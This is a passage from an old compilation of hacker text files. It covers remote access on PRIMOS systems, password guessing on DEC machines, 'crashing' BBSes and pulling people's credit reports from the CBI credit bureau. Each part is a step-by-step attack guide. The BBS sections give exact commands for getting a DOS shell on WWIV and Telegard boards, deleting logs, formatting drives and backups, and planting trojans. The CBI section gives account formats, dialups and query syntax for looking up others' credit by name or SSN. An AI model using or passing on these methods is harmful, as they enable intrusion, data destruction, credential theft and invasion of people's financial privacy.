  2018.  
  2019. The editor can also be used to write Basic, Fortran, C, and
  2020. pascal files (use the 'Languages' command to see what languages
  2021. it supports). All you do is write the program in the editor and
  2022. then save it with the correct suffix. Then you run/compile the
  2023. program. Since this file is much longer then I thought it would
  2024. be I won't discuss it, but it can easily be found out about by
  2025. using the 'HELP' command.
  2026.  
  2027. Communicating With Other Users And Systems 
  2028.  
  2029. To send a message to another user On-Line you use the Message
  2030. command. Lets say using the status command (discussed earlier)
  2031. you found there was a user named JOE that you wanted to talk to.
  2032. So you'd type .. 
  2033.  
  2034. Message JOE <CR>
  2035. Hello, how are you !
  2036.  
  2037. This will send a message to him unless you get some message that
  2038. says something like..
  2039.  
  2040. User Joe not accepting messages at this time.
  2041.  
  2042. This means that he is not accepting messages (duhhhhhh), so you
  2043. can try again later. You can also use the TALK command, which is
  2044. self-explanatory. Just type 'TALK', and then follow the
  2045. directions.
  2046.  
  2047. Accessing Remote Systems
  2048.  
  2049. The most exciting feature of primos (and this G-Phile), is
  2050. primenet's ability to access remote systems. See, they call it
  2051. primenet, because all primes are hooked-up to one big network.
  2052. This network is much like a "mini-telenet". This can be used with
  2053. the 'NETLINK' command. At a prompt, you must type 'NETLINK'. Then
  2054. you will be thrown into the netlink system. There is a good On-
  2055. Line help file which can be accessed with the 'HELP NETLINK'
  2056. command. Basically you type NC xxxxxxx <x's being the NUA>. Now,
  2057. you can scan this like telenet and see what you come up with. The
  2058. most exciting part of all this is that some primos systems on
  2059. telenet let you enter telenet NUA's in the netlink system. This
  2060. means that all those "Collect Connection" NUA's you can't call,
  2061. can be accessed through primos *FOR FREE*. This means that you
  2062. don't need to mess with NUI's anymore (see my hacking telenet
  2063. part 1 file). Now comes the part that will bring me fame in the
  2064. hacking community, fame to £egions f £ucifer, and anyone who
  2065. knows me............. 
  2066.  
  2067. The 'ANET' command
  2068.  
  2069. Yes, this is the first time this command has every been
  2070. "published" is a G-phile. The way I came about this command was
  2071. one day I was hacking around and I saw this lady's directory with
  2072. LUR access. So I looked at the files, and surprisingly there was
  2073. a file that was a *BUFFER* of her logging on to remote systems
  2074. (yes the password was there!!). I was very surprised to see that
  2075. she used a command like 'anet -8887613' to access the remote
  2076. system, instead of netlink. This is a beautiful example of how
  2077. you can do a lot even if the directory isn't ALL access, anyway
  2078. heres the good part...... What the anet command does is dial a
  2079. phone number out from the primos and connects to it!! Yes, this
  2080. is like a code (but used for data communications of course). I'm
  2081. still hacking the command, but basically you just type 'anet -
  2082. <phone number>' and you have it. I have only tried it on this one
  2083. system which is Primos version 22.1. This is a very exciting
  2084. command, so if you find any more things about it please contact
  2085. me.
  2086.  
  2087.  
  2088.                         HACKING DECs     
  2089. Welcome to basics of hacking: DECs. In this article you will
  2090. learn how to log in to dec's, logging out, and all the fun stuff
  2091. to do in-between. All of this information is based on a standard
  2092. dec system. Since there are dec system s 10 and 20, and we favor,
  2093. the dec 20, there will be more info on them in this article. It
  2094. just so happens that the dec 20 is also the more common of the
  2095. two, and is used by much more interesting people (if you know
  2096. what we mean...) Ok , the first thing you want to do when you are
  2097. receiving carrier from a dec system is to find out the format of
  2098. login names. You can do this by looking at who is on the system.
  2099. Dec=> @ (the 'exec' level prompt) you=> sy sy is short for
  2100. sy(stat) and shows you the system status. You should see the
  2101. format of login names... A systat usually comes up in this form:
  2102. job line program user job: the job number (not important unless
  2103. you want to log them off later) line: what line they are on (used
  2104. to talk to them...) These are both two or three digit numbers.
  2105. Program:   what program are they running under? If it says 'exec'
  2106. they aren't doing anything at all... User: ahhhahhhh! This is the
  2107. user name they are logged in under... Copy the format, and hack
  2108. yourself out a working code... Login format is as such: dec=> @
  2109. you=> login username pass word username is the username in the
  2110. format you saw above in the systat. After you hit the space after
  2111. your username, it will stop echoing characters back to your
  2112. screen. This is the password you are typing in... Remember ,
  2113. people usually use their name, their dog's name, the name of a
  2114. favorite character in a book, or something like this. A few
  2115. clever people have it setto a key cluster (qwerty or asdfg).
  2116. Pw's can be from 1 to 8 characters long, anything after that is
  2117. ignored. You are finally in... It would be nice to have a little
  2118. help, wouldn't it?
  2119.  
  2120.  
  2121.                           CRASHING BBSs
  2122. Fundamentals:
  2123. 1) Never use YOUR account.. always go under JOHN DOE or some
  2124. lamer's password you figured out.
  2125. 2) Never brag. It gets you in trouble. Tell some dudes in your
  2126. group or whatever but don't go posting on BBSs that you did it
  2127. unless the sysop doesn't really care (usually elite sysops  
  2128. don't)
  2129. 3) Always format. If you get in to dos, don't take the risk,
  2130. format the thing with out a boot sector. If you are going to JUST
  2131. use the format command be sure to corrupt and rename ALL the
  2132. files that might have records in them of you in his dos (in case
  2133. of a unformat command). Try low level formatting. De command:
  2134. g=c800:5 that calls up the low level format program. 4) Never
  2135. mess with a narc/fed. There ARE police boards and the like and it
  2136. just isn't worth it to mess with them. Don't be stupid.
  2137. 5) Have class. The biggest thing to bear in mind is to do a good
  2138. job, or no job. If you really don't hate him, once you get into
  2139. his dos just add a line to his autoexec.bat file to show you got
  2140. in. Otherwise format it. 6) Don't call back. You never know if he
  2141. was keeping double logs in a hidden directory or some thing like
  2142. that. Just be damn sure never to call back and NEVER leave a
  2143. number.
  2144. 7) Never delete. Never delete log files, always corrupt them by
  2145. ripping a few lines out with edlin and then rename them and
  2146. delete them. This, hopefully, will solve the undelete problem.
  2147. Another good thing to do is to start madly undoing zip files
  2148. after you delete something. This will also help the undelete
  2149. dilemma.
  2150.  
  2151. SLBBS:
  2152.  
  2153.  The first thing you should do when in dos is to run config and
  2154. find out what his activity log file name is and where his data
  2155. files REALLY are. Use edlin or something and totally screw them
  2156. over so they are screwed and them rename them and delete them.
  2157. The most important ones are ACTIVITY.LOG, SYSTEM.BBS, INDEX.BBS,
  2158. LOG.BBS
  2159.  
  2160.  Most of these files can be used to figure out who you are.
  2161. Another wise thing to do is to look in his EVENT.DEF file and see
  2162. if he copies the files to a backup directory. Check all  batch
  2163. files that the sysop may run out of EVENT.DEF. They also might
  2164. have backup in them. I, being the clever thing I am, back up my
  2165. logs to a tape backup after every call. Many sysops  use Return
  2166. to dos after logoff and a program called GODOS to run a batch
  2167. after every call. Check his config to see if go to dos after
  2168. logoff is set to yes. If so look for batch files or  com files
  2169. that look like they may be run to start the bbs. If he has a tape
  2170. backup you have to find his tape software and run it (the
  2171. directory name will be in his EVENT.DEF file if he  backs up
  2172. regularly). Once you are in the tape software you have to format
  2173. the tape, however this will take a LOOOOOONG time (1 to 2 hours)
  2174. so you may want to do that last. You want to do pretty much the
  2175. same thing but the *.BBS files will be *.SL2. Pretty easy.
  2176.  
  2177. After Shock 1.23:
  2178.  
  2179.   After Shock is kind of annoying. The best thing to do is to run
  2180. his config program t find out what his directories REALLY are
  2181. and then delete everything in his board and after shock  main
  2182. directory. Remember to look at his RUN.BAT or what ever he uses
  2183. to run the bbs with, he may be keeping backups. There is also a
  2184. config option of what batch file to run every  night. That also
  2185. may have back up info in it.
  2186.  
  2187. Telegard:
  2188.  
  2189.   All the data files will probably be in the main bbs directory
  2190. or the GOFILES directory (check config for sure). Get rid of
  2191. these and that will be about it.
  2192.  
  2193. Forum Hacks:
  2194.  
  2195.   A lot of BBS programs have been written by altering the source
  2196. code of TG or another BBS program. The best thing to do with
  2197. these is to run the config programs and find the REAL directory
  2198. names then mess them up and delete everything in them. CRASHING BBS's PART TWO
  2199.  
  2200. Table of Contents:
  2201.  
  2202. Section I : Crashing Emulex/2 & Forum Hacks
  2203.     a: Emulex/2
  2204.     b: Forum Hacks
  2205. Section II: Crashing WWIV & Telegard
  2206.     a: WWIV
  2207.     b: Telegard
  2208.  
  2209. Section Ia: Emulex/2
  2210.  
  2211. We'll start with one of the most known BBS softwares. Emulex/2.
  2212. As you all know, I, Tripin Face, stole the source code of
  2213. Emulex/2 last year from one of the programmers. Broke into his
  2214. house and grabbed a few diskettes and it just so happens that one
  2215. of the disks contained the source code to Emulex/2!!
  2216.  
  2217. Here are a few ways to access into Emulex/2 (or any Forum Clone
  2218. for that matter.. a list of Forum Clones will be shown later.)
  2219.  
  2220. When you get connected at the Matrix Menu, hack User ID #1. Of
  2221. course, its the Sysop Account. Always try the Password "Sysop",
  2222. some Sysops are SOO lame, you wouldn't believe it. If that
  2223. doesn't work, try anything that goes with the Sysop's handle...
  2224. But for the really stupid Sysops, the best way, is to get one of
  2225. his Passwords from another board and try that. Some lusers might
  2226. use the same Password. Also, if you don't hack the correct
  2227. password, don't hang up, wait for it to hang you up. Sometimes
  2228. the board hangup strings gets screwed and it doesn't get rid of
  2229. you, but lets you on the board with the account of the user you
  2230. attempted to hack!  Ok, lets say you have a Sysop account. now,
  2231. the best thing to do is get a file on the board called "USERS." 
  2232. Now, with Emulex/2, thanks to me, you can't add users, so what
  2233. you have to do is user edit each user by hand, and the view their
  2234. passwords and make sure you capture all of it.  Now, lets get to
  2235. the crashing part. Hehehehe. Open a door,("P" from the Main Menu
  2236. and then "%" for Sysop Commands) and put any file for it, the
  2237. board will create any file you ask it to make. Now in the door
  2238. batch file, you must have the following commands: 
  2239.  
  2240.   Ctty comX
  2241.   command
  2242.  
  2243. Now, comX, is the com port the bbs is set at. Now, if you know
  2244. the sysop is using com2, then put com2. DUH!!!. (Replace the "X"
  2245. with the Com Port #)  Now this door should let you go to their
  2246. DOS, and the rest is easy. FORMAT ME PLEASE!. Or, run a virus or
  2247. a trojan.. Even a baby can do that..   If you can get an account,
  2248. but has no Sysop access. you can do many things. An easy way is
  2249. upload a file called "USERS.   " with the following DSZ commands: 
  2250.          DSZ sz -fs \<dir>\<filename>
  2251. make sure you are in the DIR you want to upload to. What this
  2252. does is upload a file anywhere on the HD you want. Now, before
  2253. you do this you must edit the users file and change the sysops
  2254. password to anything you want and then you can enter it and get
  2255. on as him! This way, you can crash the board but you don't need
  2256. to get all the users passwords. Also, a way to do this and get
  2257. all the users passwords is get the BBS software's config, and the
  2258. change the co-sysop level to like Level 1 or something and then
  2259. you can call with your account and have sysop access. I found
  2260. that the best way to crash a board...   Now, with old Emulex/2
  2261. there was a command for Net-Mail which was .. Shift 1 thru shift
  2262. 0 ..like this -> !@#$%^&*() ..and with this command, the board
  2263. will receive any file. So you can use the DSZ on it. Works good,
  2264. but with the new Emulex/2 you set the Net-Mail command from the
  2265. config. Right now, in the new Emulex/2 there are only a few
  2266. backdoors. Sam Brown didn't want to add any more. Why, I don't
  2267. know. I think Emulex/2 has a upload a message command, you can
  2268. also use the DSZ command with that too. I am not sure though.. A
  2269. good way to hang a Emulex/2 board is go to the Database Area, if
  2270. there isn't one, keep on hitting "D", after a few times the board
  2271. will get screwed, you wont be able to tell unless you go the file
  2272. area, and it will say something like I/O errors, etc... then
  2273. upload and upload, and in the middle of the third or fourth
  2274. upload hang up, turn off the modem or pull the phone line out of
  2275. the wall, so it will hang on in the middle of the transfer.
  2276. Another way to hang Emulex/2 is by doing this: post a message,
  2277. and then edit a line, and insert a new line, but keep on hitting
  2278. anything until it gets to the last line. Then hang up, or try to
  2279. save. It should of hung, to make sure the hanging was cool, call
  2280. the board back and see.   Section Ib: Forum Clones
  2281.  
  2282. Now lets get to other software...
  2283.  
  2284. Well, all FORUM CLONES are the same.. so all commands for Em/2
  2285. should and will work for all the of the following BBS Softwares:
  2286.  
  2287. Emulex/2
  2288. LSD
  2289. Celerity
  2290. FCP all version
  2291. AfterShock
  2292. Monarch
  2293. Monarch/2
  2294. TCS 1 and 2
  2295. Havok
  2296. Forum Plus
  2297. ACS
  2298. UCI/Forum
  2299. Ghost Ship/2
  2300. USSR
  2301. Magnum
  2302. TCS/Cobra
  2303. Silicosis
  2304.  
  2305. Section IIa:  WWIV BBS's
  2306.  
  2307. 1) Hacking into WWIV - The Utilities Needed.
  2308.         PkZip/PkUnZip
  2309.         Zmodem (Or Any Other Protocol)
  2310.         An Account at the WWIV BBS you wish to Crash.
  2311.         A Terminal Program
  2312. 2) Hacking into WWIV - First Steps
  2313.         First of all, you might want to make a separate directory
  2314. for all of these files you're about to make.  Although there
  2315. won't be that many total, it might still be a good idea.  But if
  2316. you're like normal people (Messy), like me, just put it wherever.
  2317.  
  2318.         Ok, Here's what you do.  Make a text file called
  2319. PKUNZIP.BAT from your DOS, and put the line: command in it.  This
  2320. is done like this:  C:\HACKBBS> copy con pkunzip.bat
  2321. command
  2322. ^Z  (Press Ctrl-Z, Then Enter, and the file will save)
  2323.  
  2324.         Second, go ahead and zip the file.  Make it any filename
  2325. you want as long as it's  not something too obvious (like
  2326. TEMP.ZIP). You can zip up the file with PKZIP.EXE.  This is done
  2327. like this: 
  2328. PKZIP [zipfile] [athname\filename.ext]
  2329. - or in other words:
  2330. PKZIP temp.zip pkunzip.bat
  2331.  
  2332.        This will make a file called TEMP.ZIP with the file
  2333. pkunzip.bat in it.  Go ahead and delete pkunzip.bat now, you
  2334. won't need it anymore. Now you've got the file temp.zip  (or
  2335. whatever you called it). Go ahead and logon to your favorite WWIV
  2336. BBS.
  2337.  
  2338. Hacking into WWIV - The Way To Do It.
  2339.  
  2340.         Go ahead and logon with your  name and password,  etc. 
  2341. Go to the File section, and upload your file to any directory. 
  2342. Now there is a temp file there.  hit 'E' from the Transfer Menu
  2343. in the current directory that temp.zip is it, and when it asks
  2344. what file to extract,  enter temp.zip as the filename.  You'll
  2345. get something to the effect of:
  2346.         Extract which file?  (?=list, *=All files):
  2347. Hit '*'.  What this just did is make a pkunzip in the current
  2348. working DOS directory.  You'll be at the:
  2349.         Extract which file?  (?=list, *=All Files):
  2350. Hot the asterix (*) again.
  2351.  
  2352.         Congratulations!  You made it into the Sysops DOS!   (If
  2353. not, the sysop is smarter than you think, and he's protected
  2354. himself against some little hackers like yourself!)  Not much you
  2355. can do if you didn't make it here.  Hacking into WWIV - What to do while in DOS.
  2356.  
  2357.    You'll be in the path of \WWIV\TEMP>, Immediately type this
  2358. in:    C:\WWIV\TEMP> cd ..\files
  2359.    C:\WWIV\FILES> del *.log       - This deletes the log of what
  2360. you did.    C:\WWIV\FILES> del laston.txt  - this deletes the
  2361. list of users who were on today.
  2362.         Now, you're into his/her DOS.  Since dos interrupts are
  2363. currently ON, You can  type anything  anywhere.  You can type del
  2364. *.*  and get  the Are you sure? (Y/N) sign, and from there, you
  2365. CAN hit 'Y'.  Or you can do it the other way,  and just type echo 
  2366. y|del *.*.  From here  you got his userlist and some other fun
  2367. stuff, which is located in C:\WWIV\DATA.  You can go there by
  2368. typing cd..\data.  once there, do this: 
  2369. C:\WWIV\DATA> type user.lst 
  2370. and you'll find the Sysops Phone Number and password right next
  2371. to each other.  Write those down. Next, type cd.. and you'll be
  2372. in C:\WWIV>. From there, type the file status.dat, and the first
  2373. legible text you can find will be the System Password, so if you
  2374. just want to scare the living hell out of him, just type exit
  2375. from there and you'll come back to the BBS, with the Sysops Name,
  2376. Pass, Phone Number and System Password. You can now logon under
  2377. the Sysop and do all the cool stuff like go into UEDIT and give
  2378. yourself like 254sl and DSL, etc.
  2379.  
  2380. Hacking into WWIV - Alternatives
  2381.  
  2382. Instead of the PKUNZIP.BAT file in the TEMP.ZIP file, go ahead
  2383. and put your favorite Virus/Trojan in there, and follow the same
  2384. exact steps, except this time skip the DOS part. The Virus should
  2385. spread from there, and a trojan will work immediately.
  2386.  
  2387. Hanging WWIV - The easiest thing to do in the world.
  2388.  
  2389.     Just make a plain and simple text file, and in it include an
  2390. ANSI code. Not just any ANSI Code, it's gotta be an ANSI Code
  2391. that is not a real part of ANSI. For example, (ESCAPE
  2392. CODE)[349857m or something like that, anyway. Then just //UPLOAD
  2393. it to a message base, and read it. When WWIV Doesn't intercept
  2394. the correct ANSI Codes, it doesn't know what to do, so it'll just
  2395. hang itself there 'till the System Operator comes and resets the
  2396. flippin' computer. Hang up from there, and well, it'll be down.  Section IIb: Telegard BBSs
  2397.  
  2398.     All right, Swabbies. Here's a way to hack into Telegard (One
  2399. of the easiest to hack into - Next to WWIV). There's a catch to
  2400. this system, tho. There's got to be an Archive Menu from the File
  2401. Area. Most new Telegard systems will have one, it comes stock
  2402. into it. But the Sysop (Probably not if the Sysop is a new Sysop)
  2403. may take it out. So, if he's got it, you're in luck. It's
  2404. basically the same idea, Just follow these rules and other
  2405. guidelines, etc., and you'll soon become a better crasher than
  2406. you know ... 
  2407.  
  2408. Hacking into Telegard's DOS - Things Needed
  2409.         Latest PkZip Utilities (c) PKWare
  2410.         Terminal, Modem, Computer, etc.
  2411.         A little knowledge of the use of DOS,
  2412.         And a text file like this.
  2413.  
  2414. Hacking into Telegard's DOS - Steps
  2415.  
  2416.         1) Logging on.
  2417.         2) Finding your way.
  2418.         3) Uploading/Extracting the File
  2419.         4) What to do while in DOS.
  2420.  
  2421. First of all, You've got to  establish an account with the so-
  2422. called 'friendly BBS' that you want to crash. It's probably a
  2423. good idea to logon with a fake account, fake information, etc.,
  2424. to protect yourself. Once you've logged on, try and talk to th
  2425. Sysop there. Try to social engineer your way into him validating
  2426. you with the highest possible access you can get. Be nice, offer
  2427. him stuff, basically, KISS HIS ASS. If he insists on Voice
  2428. Validating you, ask him just to pick up a phone at his end, and
  2429. you do the same (Pick up your phone), and you'll already be
  2430. connected so there should be no numbers dialing, and this will
  2431. obviously protect you.
  2432.  
  2433. Make the PKUNZIP.BAT file from DOS, by typing in this:
  2434.                 copy con pkunzip.bat
  2435.                 command
  2436.                 ^Z
  2437.  
  2438. Go and zip the file up, call it something that sounds catchy, so
  2439. it doesn't look too inconspicuous, use the line:
  2440. pkzip myfile.zip pkunzip.bat
  2441.  
  2442. Now you have a myfile.zip with pkunzip.bat inside of it.
  2443. There's a way to get into the Telegard's File System, although
  2444. you may not haveaccess to it, you'll eventually get it if you
  2445. kiss the Sysop's ass for awhile. It's usually 'F' or 'T' from the
  2446. main menu. Once you're in there, upload a file to wherever it
  2447. tells you to, and if there's no certain directory, don't worry
  2448. about it. Just upload it. After you finish uploading the file, it
  2449. will kick you out to the transfer menu again. The Archive menu
  2450. from there is usually either '/A' or just 'A'. From there, you
  2451. will most likely get a prompt that is similar to the Transfer
  2452. prompt, (most likely containing the Area and Area Number that you
  2453. are currently in). Hit 'X' from there (Remember: Telegard has the
  2454. ability to change Command Letters, so if 'X' doesn't work, punch
  2455. in a '?' and look for Extract File). Extract the myfile.zip,
  2456. obviously extract *.*. If it kicks you back out, or whatever,
  2457. just go back into the menu and do the same thing over again.
  2458. Extract *.*, And this time it will run Pkunzip.bat, which
  2459. contains COMMAND.COM inside of it, and you'll have full access to
  2460. this guys DOS.
  2461.  
  2462. Now that you're in DOS, you'll be in the area C:\BBS\TEMP>. From
  2463. there, type in 'cd ..\files'. Then 'del *.log', 'del *.txt', then
  2464. do the same thing in the Afiles Directory. Here's a type of basic
  2465. structure that Telegard uses. (Assuming the main dir is BBS):
  2466.  
  2467.                 BBS
  2468.                   FILES
  2469.                   AFILES
  2470.                   TFILES
  2471.                   TEMP
  2472.                     1
  2473.                     2
  2474.                     3
  2475.                   DLS
  2476.                   TRAP
  2477. This is the basic format, del ALL *.log files from all of these
  2478. areas (The Sysop logs are kept in C:\BBS\TRAP>) You've now gotten
  2479. rid of all proof that you were ever on. Once in there, just do
  2480. whatever you'd like to do. Delete everything, run a few Virii,
  2481. execute a few trojans, give his computer herpes, or whatever. You
  2482. can simply exit by typing 'exit'. Another way is to upload a Game
  2483. or some file (Sysops never check the zip file to see what is in
  2484. it..) Make one of the files 'PKZIP.COM' or 'PKZIP.EXE' *.COM is
  2485. better because DOS runs COM files before EXE files. Anyway,
  2486. upload a PKZIP.COM that is a trojan or a virus, or even
  2487. COMMAND.COM (That will get you into DOS) and after you upload it
  2488. check and see if the file is 'Auto-Validated' if it isn't then
  2489. you have to wait until the Sysop Validates it.. otherwise if it
  2490. is Validated then type "/A" from the File Menu and then type "X"
  2491. or "E" for Extract ZIP File.. then it prompts you for the Zip
  2492. File, enter in the Fle you uploaded. Then it will ask you what
  2493. files to extract, just say all or just the PKZIP file.. When it
  2494. extracts it, type "Q" then type "W" for Work on Archive.. Then
  2495. you are at the 'Work on Archive Menu'. Type "A" for Add to
  2496. Archive, it will then proceed to ask you for a Archive Name,...
  2497. type in something like 'HACK.ZIP' or anything for that matter. It
  2498. will ask you for the files you want in the ZIP file, just do
  2499. '*.*'. Then it will ask you if you want to do it or add more
  2500. files, type "D" for 'Do It'. It will then run your "PKZIP.EXE" or
  2501. "PKZIP.COM"!!! Easy enough?? There are a bunch of great files you
  2502. can find in someone else's HD, try going to the Sysop Dir.
  2503. (C:\BBS\DLS\SYSOP) or just go to all the Directories right off
  2504. the root directory. After you are done having fun, take his/her
  2505. USER.LST & STATUS.DAT and you will have FOREVER Access.. or just
  2506. wipe out his drive! There are many more ways to access Telegard
  2507. DOS and have the System run what you upload, but I will not get
  2508. into that, I will leave some ways open for me, Captain
  2509. Swashbuckler, to crash those Telegard Boards!
  2510.  
  2511.  
  2512.                          CREDIT BUREAUS
  2513. Part One: What Is Credit Bureau, Incorporated?
  2514.  
  2515.   As many of you know, CBI is a credit reporting agency, or
  2516. credit bureau. It keeps the credit history of millions of
  2517. Americans on file. Our friends at CBI have been kind enough to
  2518. make this information available to the public for a moderate
  2519. annual fee. If you are cheap, or if you just want to learn how to
  2520. hack CBI, "you have come to the right place."
  2521.  
  2522.  
  2523. Part Two: The CBI Account.
  2524.  
  2525. A CBI account follows this general format:
  2526. 3 Numbers, 2 Letters, 2-5 Numbers, a dash{-}, followed by a
  2527. letter and a number.
  2528.  
  2529. A sample might look like this:  123ab4567-a1.
  2530.                            or:  123ab4567-a1,bc,d.
  2531.  
  2532. Either way is acceptable.  The `bc,d' is not necessary.
  2533.  
  2534. Part Three: Connecting To CBI.
  2535.  
  2536.     When calling CBI, I suggest you use at least one outdial if
  2537. you know for sure the account you have is valid. If you are going
  2538. to be hacking accounts, use at least three outdials. I don't
  2539. suggest calling direct, even if the dialup is local to you. If
  2540. you don't know why, you don't deserve to be reading this text.
  2541.     CBI runs at either 300 baud, or that oh-so-technologically
  2542. advanced 1200 baud. This means you will need a 300 or 1200 baud
  2543. outdial for the NPA containing the CBI dialup. Make sure your
  2544. terminal program is set at E-7-1. I also find it easier to work
  2545. at half-duplex, because CBI does not echo a thing you type. So,
  2546. if you connect with full-duplex, and don't see your account
  2547. appearing on the screen, don't call your local P/H BBS and post
  2548. twenty messages saying, "N0thInG i tYpE aPPeArS 0n tHe sCrEEn aT
  2549. CbI!!!!!!!!!!!1!!1!1!!!!!!!!!!!!111!!!!!!!!!!!" (Note: the
  2550. exorbitant amount of exclamation points is a sign of the loser's
  2551. complete and utter idiocy.) Another thing I find useful is just
  2552. to have my capture log running as I work. This saves you the
  2553. trouble of having to write everything down, and it also serves as
  2554. a good reference.
  2555.  
  2556.  
  2557.     Currently functioning CBI dialups are:
  2558.  
  2559.        *[201/984-6297] Newark, New Jersey
  2560.        *[503/226-1070] Portland, Oregon
  2561.         [612/341-0023] Minneapolis/St. Paul, Minnesota
  2562.         [713/591-8100] Houston, Texas
  2563.        *[804/466-1619] Norfolk, Virginia
  2564.         [916/635-3935] Sacramento, California
  2565.  
  2566.     The starred numbers I have not verified.
  2567.  
  2568.     Keep in mind some CBI accounts are only valid on certain
  2569. dialups. They still serve any part of the country, you just can't
  2570. use them on every dialup. I have found CBI accounts that work on
  2571. more than one dialup, so it can't hurt for you to try. The worst
  2572. thing you will get is a message saying it's NOT VALID ON THIS
  2573. PHONE NUMBER or something. If you are hacking accounts and get
  2574. this message, try the account that yields the message on
  2575. different dialups. Maybe you'll "get lucky".
  2576.  
  2577.     CBI also has voice dialups.  These numers are provided for
  2578. those "Social Engineers" out there.  I have not verified these.
  2579.  
  2580.         [201/842-7500] Newark, New Jersey (Equifax Credit
  2581. Information Services)         [617/932-8163] Boston,
  2582. Massachusetts (CBI)
  2583.  
  2584.  
  2585. Part Four: Applied Password Use: Pulling Info.
  2586.  
  2587.     Use is fairly straightforward.  When you connect to CBI, hit
  2588. Control-S (^S) twice, then <RETURN> (<CR>) twice.  You should get
  2589. a message that reads:         (ND)PLEASE SIGN-ON
  2590.  
  2591.     At this point you should enter the password.  Make sure when
  2592. you enter the password that you include a period at the end. 
  2593. This is very important; if you neglect to type the period, you
  2594. won't get in.  Type the password: "123ab456-a1." then hit
  2595. CONTROL-S, and a <CARRIAGE RETURN>.  The ^S is the CBI "wakeup"
  2596. command.  CBI doesn't respond to regular <CR>s.  If you ever
  2597. think CBI should be doing something, and it has just frozen, hit
  2598. ^S.  Chances are this will solve the problem.  Anyway, you will
  2599. then get a message telling you to
  2600.  
  2601.         WC5E - PROCEED
  2602.  
  2603.     This is when the fun begins.  You decide you want to know
  2604. your next door neighbor's credit history.  Here is what you do:
  2605.  
  2606.         NM-SMITH,ALAN,S. <CR>
  2607.         CA-157,MAPLE,ST,YUTZVILLE,NY,10011. <CR>
  2608.         ID-SSS-012-34-5678. ^S <CR>
  2609.  
  2610.     This is, of course, based on the assumption that your
  2611. subject's name is "Alan S. Smith" and that he lives at 157 Maple
  2612. Street in Yutzville, New York, 10011, and that his Social
  2613. Security Number is 012-34-5678. Keep in mind, the ID-SSS line is
  2614. not ecessary, but it is necessary if you are to distinguish
  2615. between Alan S. Smith, Jr. and Alan S. Smith, Sr. Wait a moment.
  2616. The report will pop up.   You may want to hunt someone down from
  2617. a Post Office Box. If this is the case, replace the above CA-
  2618. line with this:
  2619.  
  2620.         CA-418#,POB,,YUTZVILLE,NY,10011.
  2621.  
  2622.     If you only have the subject's Social Security Number, type
  2623.  
  2624.         DTEC-012-34-5678. ^S <CR>
  2625.  
  2626.     This will give you a name and address to enter in the above
  2627. format.
  2628.  
  2629.  
  2630. Part Five: A Sample CBI Report.
  2631.  
  2632. :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  2633.                      S A M P L E    C B I    R E P O R T
  2634.   Note: All information in this report is fictional, including
  2635. the ACCOUNT                          NOs and the BUS/ID CODEs.
  2636. :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  2637.  
  2638. *SMITH,ALAN,S   SINCE 04/00/75  FAD 10/21/89           FN-700 
  2639. 157,MAPLE,ST,YUTZVILLE,NY,10011,TAPE RPTD 10/89
  2640.  68,PENN,ST,NOWHERE,IA,50055
  2641.  SEX-M,MAR-M,DEPS- 2,AGE-38,SSS-012-34-5678
  2642. 01 ES-WALMART CORP
  2643. 02 EF-MCDONALDS RESTAURANTS
  2644.  
  2645. *SUM-01/85-01/91,PR/OI-NO,FB-NO, ACCTS:11,HC$6-1600, 3-ONES.
  2646.  
  2647. *INQS-450DC81 02/24/89,178BB20089 02/06/89.
  2648.  
  2649. *   BUS/ID CODE  RPTD  OPND  H/C TRMS  BAL  P/D RT 30/60/90+MR 
  2650. DLA/ACCOUNT NO
  2651. 03 S*178BB34860 11/90 05/85  500 171   521  139 R5 01 01 01 66
  2652. 1234567890123456
  2653.            PREV HI RATES:  R4 10/90, R3 09/90, R2 08/90
  2654.    CLOSED ACCOUNT
  2655.    AMOUNT IN H/C COLUMN IS CREDIT LIMIT
  2656. 04 I*178CD8712  10/90 03/89  123 123   123      O1           
  2657. 003/88  048286423 05 I*342IH34    10/90 12/85 1600       500 1600
  2658. R9 00 00 03           462642892            PREV HI RATES:  R5
  2659. 11/88, R5 10/88, R5 09/88
  2660.    CHARGED OFF ACCOUNT
  2661.    AMOUNT IN H/C COLUMN IS CREDIT LIMIT
  2662. 06 I*905PZ82    11/90 12/86  700         0  390 R9 00 00 00 16   
  2663. 3482684629331            PREV HI RATES:  R9 03/89, R9 02/89, R9
  2664. 01/89                            CHARGED OFF ACCOUNT              
  2665.                                               AMOUNT IN H/C
  2666. COLUMN IS CREDIT LIMIT                                         07
  2667. U*178BQ282   10/90 01/85            231  231 R9 00 00 03   
  2668. 4560337134046711            PREV HI RATES:  R5 04/90, R5 03/90,
  2669. R4 02/90                            CHARGED OFF ACCOUNT
  2670. 08 I*956BB115   10/90 05/86 1100         0      R9 00 00 03       
  2671.    714827012            PREV HI RATES:  R5 05/90, R5 04/90, R5
  2672. 07/89                            CLOED ACCOUNT
  2673. 09 I*178AC10870 07/90 05/87  123 123   123  123 R9                
  2674.  38812604654    CHARGED OFF ACCOUNT
  2675. 10 A*906OC69    01/90 10/87              0      O5 00 00 01 09
  2676. 01/90 4906124373            PREV HI RATES:  O5 04/89.             
  2677.                                  COLLECTION ACCOUNT               
  2678.                                               PAID-CREDIT LINE
  2679. CLOSED                                                      11
  2680. I*906OF259   12/89 11/87    6         6    6 O9 00 00 02      
  2681. 3724962236703            PREV HI RATES:  O5 11/89, O5 10/89, O9
  2682. 02/89
  2683. 12 I*416DC1577  11/88 11/87  300                R1 00 00 00 12  
  2684. 32134882735921    SETTLEMENT ACCEPTED ON THIS ACCOUNT             
  2685.                                CHARGE                             
  2686.                                          13 I*421DC4566  07/89
  2687. 10/87  401       390  372 R9 00 00 01      18736847728634
  2688.            PREV HI RATES:  R9 02/89, R9 01/89, R5 12/88           
  2689.                 CHARGED OFF ACCOUNT                               
  2690.                             CHARGE                               
  2691.                                       
  2692.  
  2693. &
  2694. END OF REPORT    CBI AND AFFILIATES  -  01/30/91              
  2695. SAFESCANNED
  2696.  
  2697. ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: 
  2698.                   E N D   S A M P L E   C B I   R E P O R T 
  2699. :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  2700. :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  2701.                       S A M P L E   D T E C   R E P O R T
  2702. :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  2703. M1 OF 1  NM-SMITH,ALAN,S 
  2704. CA-157,MAPLE,ST,YUTZVILLE,NY,10011,10/89   
